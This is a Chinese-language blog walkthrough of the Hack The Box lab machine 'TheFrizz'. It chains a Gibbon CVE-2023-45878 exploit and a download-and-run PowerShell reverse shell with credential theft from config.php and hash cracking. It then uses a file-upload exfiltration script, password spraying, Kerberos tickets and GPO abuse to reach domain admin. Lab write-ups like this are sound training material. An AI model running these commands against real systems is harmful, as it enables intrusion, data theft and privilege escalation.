HTB-TheFrizz

HTB-TheFrizz

信息收集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
rustscan -a 10.10.11.60 --range 1-65535 -- -sV
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.60:22
Open 10.10.11.60:53
Open 10.10.11.60:80
Open 10.10.11.60:88
Open 10.10.11.60:135
Open 10.10.11.60:139
Open 10.10.11.60:389
Open 10.10.11.60:445
Open 10.10.11.60:464
Open 10.10.11.60:593
Open 10.10.11.60:636
Open 10.10.11.60:3268
Open 10.10.11.60:3269
Open 10.10.11.60:9389
Open 10.10.11.60:49664
Open 10.10.11.60:49668
Open 10.10.11.60:49670
Open 10.10.11.60:56427
Open 10.10.11.60:56418
Open 10.10.11.60:56414
[~] Starting Nmap
[>] The Nmap command to be run is nmap -sV -vvv -p 22,53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49664,49668,49670,56427,56418,56414 10.10.11.60

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-12 04:01 UTC
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 04:01
Scanning 10.10.11.60 [4 ports]
Completed Ping Scan at 04:01, 1.78s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 04:01
Scanning frizzdc.frizz.htb (10.10.11.60) [20 ports]
Discovered open port 53/tcp on 10.10.11.60
Discovered open port 139/tcp on 10.10.11.60
Discovered open port 22/tcp on 10.10.11.60
Discovered open port 56427/tcp on 10.10.11.60
Discovered open port 445/tcp on 10.10.11.60
Discovered open port 80/tcp on 10.10.11.60
Discovered open port 135/tcp on 10.10.11.60
Discovered open port 389/tcp on 10.10.11.60
Discovered open port 593/tcp on 10.10.11.60
Discovered open port 636/tcp on 10.10.11.60
Discovered open port 56414/tcp on 10.10.11.60
Discovered open port 49670/tcp on 10.10.11.60
Discovered open port 464/tcp on 10.10.11.60
Discovered open port 49668/tcp on 10.10.11.60
Discovered open port 9389/tcp on 10.10.11.60
Discovered open port 3269/tcp on 10.10.11.60
Discovered open port 56418/tcp on 10.10.11.60
Discovered open port 3268/tcp on 10.10.11.60
Discovered open port 49664/tcp on 10.10.11.60
Discovered open port 88/tcp on 10.10.11.60
Completed SYN Stealth Scan at 04:01, 0.61s elapsed (20 total ports)
Initiating Service scan at 04:01
Scanning 20 services on frizzdc.frizz.htb (10.10.11.60)
Completed Service scan at 04:02, 57.89s elapsed (20 services on 1 host)
NSE: Script scanning 10.10.11.60.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:02
Completed NSE at 04:02, 1.21s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:02
Completed NSE at 04:02, 1.08s elapsed
Nmap scan report for frizzdc.frizz.htb (10.10.11.60)
Host is up, received echo-reply ttl 127 (0.42s latency).
Scanned at 2025-04-12 04:01:39 UTC for 61s

PORT      STATE SERVICE       REASON          VERSION
22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-12 10:42:29Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56414/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56418/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56427/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.41 seconds
           Raw packets sent: 24 (1.032KB) | Rcvd: 21 (908B)

image-20250412155439189

这是一个Gibbon(Gibbon 是由教师创建的学校平台,旨在解决教育工作者每天遇到的实际问题.) 版本是25.0.00

CVE-2023-45878

在阿里云的漏洞库中找到相关的利用,其中主要的是不需要身份验证。

image-20250412160429952

image-20250412160539272

抓个包利用一下。

image-20250412161029473

image-20250412161104799

反弹一个shell.

利用nishang里面的一个powershell脚本。

image-20250412163137949

1
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.9:8081/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 1234

john爆破密码

在C:\xampp\htdocs\Gibbon-LMS下有一个config.php文件,里面存放数据库的账户和密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
*/

/**
 * Sets the database connection information.
 * You can supply an optional $databasePort if your server requires one.
 */
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

/**
 * Sets a globally unique id, to allow multiple installs on a single server.
 */
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';

/**
 * Sets system-wide caching factor, used to balance performance and freshness.
 * Value represents number of page loads between cache refresh.
 * Must be positive integer. 1 means no caching.
 */
$caching = 10;

mysql.exe再C:\xampp\mysql\bin目录下。

image-20250412180431705

1
2
3
.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "show databases;"
.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "show databases;use gibbon;show tables;"
.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "show databases;use gibbon;select * from gibbonperson;" -E //-E是以垂直格式输出

注意这个-p和密码之间不能有空格,后面加个-e是为了执行命令,不加的话,执行前面的会没结果返回。

image-20250412181741360

image-20250412182809128

1
2
3
4
gender: Unspecified
               username: f.frizzle
         passwordStrong: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
     passwordStrongSalt: /aACFhikmNopqrRTVz2489

john爆破一下,它是一个sha256的。

创建一个hash.txt

1
f.frizzle:$dynamic_82$067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489

然后

1
john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

image-20250412191539412

1
Jenni_Luvs_Magic23

创建票据

利用kerbrute进行验证一下。

1
kerbrute bruteuser --dc 10.10.11.60 -d frizz.htb pass.txt f.frizzle

image-20250412201858393

这里直接用账户密码进行登录的话是进行不了的,需要利用票据。

1
2
3
4
5
6
faketime "$(ntpdate -q frizz.htb | awk '{print $1" "$2}')" zsh  //修改时间
ntpdate frizzdc.frizz.htb  //同步时间的
impacket-getTGT frizz.htb/'f.frizzle':'Jenni_Luvs_Magic23' -dc-ip frizzdc.frizz.htb  //请求TGT票据
export KRB5CCNAME=f.frizzle.ccache  //加载这个票据
上面的22端口开放 可以利用ssh以及生成的票据远程登录到目标主机上
ssh f.frizzle@10.10.11.60 -K

注意要ssh成功的话需要创建etc/krb5.conf。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB

image-20250412222055453

再桌面发现user.txt

image-20250412222232116

image-20250412222250039

还存在其他的账户。

GPO abuse提权

bloodhound分析一波。

1
bloodhound-python -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60 -c all --zip

image-20250412224206895

利用powersell检查是否有删除的文件:

1
2
3
$shell = New-Object -ComObject Shell.Application
$recycleBin = $shell.Namespace(0xA)
$recycleBin.items() | Select-Object Name, Path

image-20250415181651092

image-20250415181852544

down下来。

首先在kali上运行一个flask服务 

1
2
3
4
5
6
7
8
9
10
from flask import Flask, request
app = Flask(__name__)

@app.route('/upload', methods=['POST'])
def upload_file():
    file = request.files['file']
    file.save(file.filename)
    return 'OK'

app.run(host='0.0.0.0', port=8000)

然后windows上运行powershell脚本:

1
2
3
4
5
$FilePath = "C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z"
$Url = "http://10.10.14.80:8000/upload"

$wc = New-Object System.Net.WebClient
$wc.UploadFile($Url, "POST", $FilePath)

image-20250415184853193

image-20250415184903461

image-20250415184913956

成功down下来。

1
7z x '$RE2XMEG.7z'  //解压一下

image-20250415185726549

base64解码:

1
!suBcig@MehTed!R

是一个密码,但不知道是谁的。

密码喷洒一下:

1
kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'

image-20250415191708865

跟上面的思路一样,申请票据,ssh登录。

1
2
impacket-getTGT frizz.htb/'M.SchoolBus':'!suBcig@MehTed!R' -dc-ip frizzdc.frizz.htb
export KRB5CCNAME=M.SchoolBus.ccache

image-20250415192456547

仍然是bloodhound-python收集一下信息:

注意kerberos的时间。

1
faketime "$(ntpdate -q frizz.htb | awk '{print $1" "$2}')" zsh
1
bloodhound-python -u 'M.SchoolBus' -p '!suBcig@MehTed!R' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60 -c all --zip

image-20250415204328420

M.SchoolBus属于DESKTOP ADMINS组 权限更高一点

image-20250415211226900

M.SchoolBus也属于GROUP POLICY CREATOR OWNERS(GPCO组)

image-20250415214645048

这里看wp是说进行GPO abuse攻击

创建一个新的GPO,然后将其链接到整个域中,利用SharpGPOAbuse.exe将M.SchoolBus添加到管理员中这条组策略进行添加,最后刷新GPO启动上面的组策略。

1
2
3
4
5
6
7
8
// 创建恶意GPO
New-GPO -Name "hacker"
// 链接GPO到域控制器
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
// 将M.SchoolBus加入域管理员组
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
// 刷新GPO
gpupdate /force

image-20250415225402344

image-20250415225425376

image-20250415225602315

可以看到已经被添加到管理员组中。

然后利用RunasCS开启另外一个进程:

https://github.com/antonioCoco/RunasCs

1
2
.\Runas.exe M.SchoolBus !suBcig@MehTed!R cmd.exe -r 10.10.14.80:8888
在kali上进行监听8888端口

image-20250415230549080

image-20250415230559945

Windows中级靶机
#HTB
HTB-TheFrizz
http://example.com/2025/04/12/HTB-TheFrizz/
作者
FSRM
发布于
2025年4月12日
更新于
2025年4月15日
许可协议